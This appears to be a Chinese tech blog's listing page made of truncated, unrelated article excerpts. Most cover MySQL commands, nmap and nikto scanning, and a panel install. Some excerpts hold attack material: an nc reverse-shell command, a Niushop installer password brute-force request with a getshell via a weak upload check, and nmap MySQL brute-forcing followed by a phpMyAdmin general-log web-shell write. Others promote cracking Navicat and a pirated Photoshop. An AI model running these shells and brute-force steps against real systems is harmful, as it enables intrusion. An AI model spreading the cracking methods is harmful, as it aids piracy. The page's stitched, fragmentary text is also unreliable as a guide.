建站VPS工具综合杂谈

Mysql是最常见的关系数据库，因开源和免费被广泛使用。如果当我们数据库误删后，在没有备份的情况下如何恢复数据库呢？ Mysql8.0数据库恢复环境Windows LinuxMysql8.0.12PHP7.4Dzx3.4 故障描述有网友联系我，说自己的dz站不小心删库了！本地没有备份，已经运维了好几年了。看能不能恢复，在咨询后发现他用的小皮面板，很显然没有做好备份功能！在查阅一番后，知道了自Mysql8.0后，当用户创建了数据库后，会在MySQL8.0.12\data目录下产生相应的恢复文档，用于后期的恢复！当然Mysql之前的版本也有这个功能，但是文件格式变了！ 文件说明XXX.sdi表结构文件XXX.MYD数据文件XXX.MYI索引文件我们可以利用这三个文件完成对数据库的恢复！ 删库恢复测试1.我们首先创建一个数据库bbskali create database bbskali;2.创建数据表 并建立相应的字段 CREATE TABLE `bbskali`.`nbkali` ( `id` INT(255) NOT NULL , `name` CHAR(255) NOT NULL , `nmuber` INT(255) NOT NULL , `age` INT(255) NOT NULL ) ENGINE = MyISAM; 3.删除数据库 4.我们在date目录下可以看到刚才建立的数据库bbskali的文件夹，以及有关表的相关文件。 5.将文件复制出来，并新建数据库bbskali2和表nbkali(建立字段，不填数值。) 6.继续会…

登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname;

一：登录数据库格式：mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库： 二：显示数据库：show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四：查询 select * from users; 五：新建数据库create database xxx;xxx为数据库的名称 六：删除数据库drop database xxx;

Mysql是著名的关系数据库，因其性能稳定，免费而广而人知。现对其基础语法做简单的总结！ 登录数据库mysql -u root -p nter password:****** # 登录后进入终端创建数据库create DATABASE bbskali;drop 命令删除数据库drop 命令格式： drop database <数据库名>; 例如删除名为 bbskali 的数据库： drop database bbskali;创建数据表创建MySQL数据表需要以下信息： 表名表字段名定义每个表字段 语法 以下为创建MySQL数据表的SQL通用语法： CREATE TABLE table_name 以下例子中我们将在kali 数据库中创建数据表xiao_tbl： CREATE TABLE `xiao_tb1`( `id` INT UNSIGNED AUTO_INCREMENT, `name` VARCHAR(100) NOT NULL, `number` VARCHAR(40) NOT NULL, `submission_date` DATE, PRIMARY KEY ( `id` ) )ENGINE=InnoDB DEFAULT CHARSET=utf8;实例解析： 如果你不想字段为 NULL 可以设置字段的属性为 NOT NULL， 在操作数据库时如果输入该字段的数据为NULL ，就会报错。 AUTO_INCREMENT定义列为自增的属性，一般用于主键，数值会自动加1。 PRIMARY KEY关键字用于定义列为…

在这篇文章中，我们将向您展示如何重置MySQL root密码以备忘记。 以下步骤适用于任何现代Linux发行版。 首先停止MySQL或MariaDB服务 sudo systemctl stop mysql无需密码即可启动MySQL服务器 mysqld_safe --skip-grant-tables &登录到MySQL shell mysql -u root如何重置MySQL root密码 设置一个新的MySQL root密码 根据您在系统上运行的MySQL或MariaDB服务器版本，您需要使用不同的命令来恢复root密码。 您可以通过发出以下命令找到您的服务器版本： mysql --version mysql Ver 8.0.11 for Linux on x86_64（ MySQL Community Server - GPL ）如何重置MySQL root密码从上面的输出中可以看到，我运行的是MySQL 8.0.11版本。 如果您有MySQL 5.7.6及更高版本或MariaDB 10.1.20及更高版本，请运行以下命令： ALTER USER 'root'@'localhost' IDENTIFIED BY 'MY_NEW_PASSWORD'; FLUSH PRIVILEGES;如果您有MySQL 5.7.5及更早版本或MariaDB 10.1.20及更早版本，请运行以下命令： SET PASSWORD FOR 'root'@'localhost' = PASSWORD('MY_NEW_PASSWORD'); FL…

1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 －p用户密码 （如连接远程数据库 ：mysql -h192.168.xxx.xxx -uroot -p123） 　mysql -u用户名 -p用户密码（如连接本地数据库：mysql -uroot -p123） 4.显示命令：数据库版本信息：show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构： describe 表名;查看当前使用的数据库 select database();

登录数据库，并创建数据库student 创建数据库命令 create database student创建两个表student,和score即学生表和成绩表。 student表的字段有id,name,class,number score表中的字段有number,chinese,math,english 创建表 create table student(`id` int(4),`name` char(40),`class` char(40),`number` char(40)); create table score(`number` char(40),`chinaese` char(40),`math` char(40),`english` char(40)); 当前的表 写入测试数据 insert into student(id,name,class,number) values('1',"张三","一班","201901"); insert into student(id,name,class,number) values('2',"令狐冲","二班","201902"); insert into student(id,name,class,number) values('3',"张三丰","三班","201903"); insert into student(id,name,class,number) values('4',"娜可露露","一班","201904"); insert into score(number,chin…

mysql求和首先来看看数据库的结构 Idnameywsxlssum 1张三67458078 2李四67778998 3逍遥子78886789 求列的和比如，我现在要求字段yw的总和。 select sum(yw) from chengji; 求行的和比如，我现在要求张三的yw sx ls sum的和 select name, (yw+sx+ls+sum) as zonghe from chengji; 平均值求yw的平均值 select AVG(yw) from chengji; 最大值 最小值select max(yw) from chengji; select min(yw) from chengji;

Navicat Premium是一个很好的数据库管理工具。将此工具连接到一个数据库，在那里您可以看到各种数据库的详细信息。这包括报告错误，等等。当然，还可以通过他登录数据库，进行各种操作。Navicat Premium是一个多链接的数据库管理工具，允许您在一个程序中同时连接到MySQL, SQLite, Oracle和PostgreSQL数据库，使它更容易管理不同类型的数据库。版本Navicat Premium 16.0.10 下载官网下载地址：https://www.navicat.com.cn/products/navicat-premium Navicat Premium 16新增功能1、图表 Navicat 16提供了更多数据源和图表支持。我们非常注重提高可用性和可访问性，为你的工作提供至关重要的信息.。 2、数据生成 数据生成可帮助你创建大量测试数据。让你在相互关联的多个表中创建复杂的数据。 3、On-Prem Server现已添加到我们的 Navicat系列中。我们为你提供托管云环境的选项,在你所在的位置内部存储Navicat 对象。 4、连接配置文件 为外出用户配置多个连接配置文件，可根据使用的设备的当前位置切换连接设置。 5、生产力 Navicat 16具有众多功能和UI/UX改进，以满足你的数据库开发需求。为你提供构建、管理和维护数据库的新方法。 安装 破解Navicat 16.0.10目前尚未有注册机，但是我们可以利用清除注册表的方法。来延长试用期。当然你也可以下载16.0.x其他版本的破解版。 脚本如下： @ec…

实验环境kali2020 （内网IP：192.168.123.33）Centos (百度云服务器)实验目的在 kali中获取百度云服务器的权限 PS: 需要提前开启相应额端口。 实现步骤在kali中监听 5555 端口 nc -lvp 5555在百度云服务器中执行 nc 192.168.123.33 5555 -e /bin/sh需要注意的是，因为服务器和kali不在同一网段。我在实际操作中用的是映射后的IP和端口。如果你的环境在同一网端，直接执行上面命令即可。 实验结果 其他当然，将两条命令反过来。便可以实现云服务器远程控制本地的kali。

启动服务service nussusd start在浏览器中输入https://127.0.0.1:8834 ps会提示错误信息，这是因为https 证书的问题，点击高级选项，忽略或者添加证书即可。 如图，输入账号和密码，登录nussus 新建扫描点击右上角的new scan 设置目标地址 以及相应的插件是否开启（默认开启） 查看结果扫描完成后，点击刚才的项目。可以看到当前系统中漏洞情况。 漏洞利用看看windows中的一些高危漏洞。选择下方的编号。在msfconsole中搜索模块，利用即可。 利用成功效果

1：普通扫描nikto -h 目标 实例： nikto -h 192.168.3.1112:扫描指定端口nikto -h -h 192.168.0.1 -p 443 对443端口的扫描 nikto -h 192.168.3.111 -p 443 3:目录猜解-C 指定CGI目录 –all表示猜解CGI目录 nikto -h 192.168.3.111 -C all 4:漏洞扫描-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 -T选项包含的小选项解释： 0 检查文件上传页面 1 检查web日志 2 检查错误配置或默认文件 3检查信息泄露问题 4 检查XSS/Script/HTML问题 5 从根目录检查是否存在可访问的文件 6 检查拒绝服务问题 7 从任意文件检索是否存在可访问文件 8 检查是否存在系统命令执行漏洞 9 检查SQL注入漏洞 a 检查认证绕过问题 b 识别安装的软件版本 c 检查源代码泄露问题 x 反向链接选项 如：扫描sql注入漏洞 nikto -h 192.168.3.111 -T 9

介绍NIKTO:perl语言开发的开源WEB安全扫描器；识别网站软件版本；搜索存在安全隐患的文件；检查服务器配置漏洞；检查WEB Application层面的安全隐患；避免404误判依据响应文件内容判断，不同扩展名的文件404响应内容不同。命令列表root@kali:~#nikto -h Option host requires an argument -config+ Use this config file -Display+ Turn on/off display outputs -dbcheck check database and other key files for syntax errors -Format+ save file (-o) format -Help Extended help information -host+ target host -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -output+ Write …

Niushop开源商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序,开源新零售。下载链接：http://www.niushop.com.cn/download.html Version：单商户 2.2 安装爆破MySQL密码GET /niushop/install.php?action=true&dbserver=127.0.0.1&dbpassword=root2&dbusername=root&dbname=niushop_b2c HTTP/1.1 Host: 127.0.0.1 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Referer: http://127.0.0.1/niushop/install.php?refresh Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: action=db Connection: close 爆破成功返回1，密码错误返回0 getshell 上传图片只做了前端校验…

一、前言：Nmap是一个非常实用的网络连接端扫描软件，适用于Linux、Windows、Mac三大主流平台。用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。 二、主机发现：1.全面扫描/综合扫描 nmap -A 192.168.242.1 2.Ping扫描 nmap -sP 192.168.242.1/243.免ping扫描，穿透防火墙，避免被防火墙发现 nmap -P0 192.168.242.14.TCP SYN Ping扫描 nmap -PS -v 192.168.242.135nmap -PS80()端口，10-100 -v 192.168.242.135 (针对防火墙丢弃RST包) 5.TCP ACK Ping 扫描 nmap -PA -v 192.168.242.135UDP Ping 扫描 nmap -PU -v 192.168.242.135ICMP Ping Types 扫描 nmap -PU -v 192.168.242.135 (ICMP ECHO) nmap -PP -v 192.168.242.135 (ICMP 时间戳) nmap -PM -v 192.168.242.135 (ICMP 地址掩码)ARP Ping 扫描 nmap -PR -v 192.168.242.1列表扫描 nmap -sL -v 192.168.242.110.禁止方向域名解析 nmap…

Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它！本文将要介绍nmap在渗透测试中，都有那些运用和攻击手段。 一：利用nmap对目标进行信息收集命令如下： nmap -T4 -A 192.168.123.239 从上图我们发现,目标是一台windows系统，并且开启了常见的80 445 3306等常见的端口。 二：对目标站点进行扫描命令如下： dirb http://192.168.123.239 通过对目标站点分析，我们发现了一些敏感的文件目录。phpMyAdmin include等等。 在第一步中，我们扫描到了3306端口，这也意味着目标可以远程登录数据库。 三：利用nmap暴力破解mysql命令如下： nmap -p 3306 --script=mysql-brute.nse 192.168.123.239 如上，通过暴力破解，我们得到了账号和密码为root和123456 四：尝试远程登录命令如下： mysql -h 192.168.123.239 -u root -p成功登录数据库 利用phpMyAdmin拿shell在前期的文章中提到过，我们先登录到phpMyAdin 执行下面的sql语句 SET GLOBAL GENERAL_log='on'; SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php'; SELECT '<?php phpinfo(); ?>';需要注意的是，一定要写对目标的站点根目录的绝对地址 …

nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口，便可进行下一步的渗透测试。当然，利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式，其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点：不会返回太多无用的结果造成对结果的分析，并且比较高效。 缺点：部分设备有时扫不到，需多扫描几次。 无ping扫描ping扫描虽然简单，但是当开启了禁ping后，以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点：可避免防火墙的发现，可以详细的看到设备开启了那些端口。 缺点： 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描，通过发送和接收报文的形式进行扫描，在这种情况下每个端口都会轻易的被发现。 命令： nmap -PS 192.168.123.1/24 优点：扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文，所以nmap提供了SYN和ACK两种扫描方式，这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起，这样效果会更好。 UDP扫描使用UDP扫描，nmap会发送一个空的报文到主机，如果返回则说明…

关于Nmap的教程，在前面的文章中写到过很多次了。通常情况下，我们是直接用Nmap扫描端口，然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐，那么我们就要有必要认识一下Nmap的扩展脚本了！ nmap --scriptNmap的脚本位置：/usr/share/nmap/scripts/ 查看脚本的数量 ls /usr/share/nmap/scripts/ | wc -l可以看到，目前有605个，当然这些插件我们可以自己编写，也可以去下载。总之很方便的。 nmap脚本主要分为以下几类，在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描： 脚本名说明auth绕开鉴权 检测是否存在弱口令broadcast局域网内探查更多服务开启状况brute暴力破解方式，针对常见的应用如http/snmp等default使用-sC或-A选项扫描时候默认的脚本dos用于进行拒绝服务攻击exploit利用已知的漏洞vuln负责检查目标机是否有常见的漏洞常用示例检查弱口令nmap --script=auth 192.168.123.1 暴力破解可对mysql http smtp等常见协议进行暴力破解。 nmap --script=brute 192.168.123.1如下，我们通过暴力破解，得到了telent的登录密码为admin 尝试登录 默认脚本扫描默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击。 nmap --script=default 192.168.123.1 或者 n…

脚本参数SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts --script-args-file=filename: provide NSE script args in a file --script-trace: Show all data sent and received --script-updatedb: Update the script database. --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma-separated list of script-files or script-categories. -sC 是指的是采用默认配置扫描，与--script=default参数等价 具体调用的函数列表包括 default NSE Category(https://nmap.o…

利用nmap的插件nse功能，便可以方便的完成各种渗透测试。如sql注入的检测，密码的破解等等。 Update NSE Databasenmap --script-updatedbXSS检测Nmap -sV --script=http-unsafe-output-escaping <target>SQL Injectionnmap -sV --script=http-sql-injection <target>

Office 2019 Microsoft Office 2019于今年9月28日正式发布，不过仅支持WIN10系统，我想大家首先想知道的就是2019版增加了哪些新功能亮点，让我们先来一起看一下吧！ 亮点1：标签切换动画 Office 2019增加了很多界面特效动画，其中标签动画便是其中最吸引人的一个。每当我们点击一个Ribbon面板时，Office都会自动弹出一个动画特效。整体感觉很像是Win10特有的窗口淡入与淡出。从实际使用情况来看，新增加的过渡特效不仅没有对性能进行拖累，还给人了一种界面切换流畅的感觉，让人耳目一新。 标签切换动画 亮点2：内置IFS等新函数 Excel 2019内置了几款新函数，比如”IFS”多条件判断、”CONCAT”多列合并、“TEXTJOIN“多区域合并等等。以”IFS“举例，条件判断一般我们会选择IF，当条件多于两种时就需要多组IF函数进行嵌套。要是嵌套的层级过多，不仅书写上会有麻烦，后期排错也会相当繁琐。 相比之下，IFS则是将多个条件并列展示，语法结构类似于“IFS(条件1，结果，条件2，结果，条件3，结果，……)”，最多可支持127个不同条件，算得上是给IF函数开挂了! 亮点3：在线插入图标 制作PPT时我们常会使用一些图标，大多数图标结构简单、传达力强，却并不好找。最新版Office 2019则增加了在线图标插入功能，让我们可以像插入图片一样一键插入图标。从试用情况看，Office 2019的在线图标库还是蛮丰富的，分为“人物“、”技术与电子“、”通讯“、“商业”、“分析”、“商贸”、“教育”…

说明方法有哪些是一个百度网盘搜索工具，我们可以搜索很多网盘里的资源，就算是加密文件，有的也会自动获取密码，但不是全部都能获取到，总体来说还是很强大的。 截图 使用方法下载后打开，输入搜索内容后，搜索，双击列表将会自动打开该网盘链接，若有密码将自动复制密码，再将密码粘贴进去。

安装下载地址： 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是，我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。

源码<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>bbs统计系统</title> <!--数据库--> <?php $servername = "localhost"; $username = "root"; $password = "123456"; $dbname = "tj"; // 创建连接 $conn = mysqli_connect($servername, $username, $password, $dbname); // Check connection if (!$conn) { die("连接失败: " . mysqli_connect_error()); } $sql = "SELECT * FROM sj"; $result = mysqli_query($conn, $sql); $result = mysqli_query($conn, $sql); if…

安装安装方法（phpstudy for linux V0.2公测版） 使用 SSH 连接工具 连接到您的 Linux服务器后，根据系统执行相应命令开始安装（大约2分钟完成面板安装）： Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下： 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置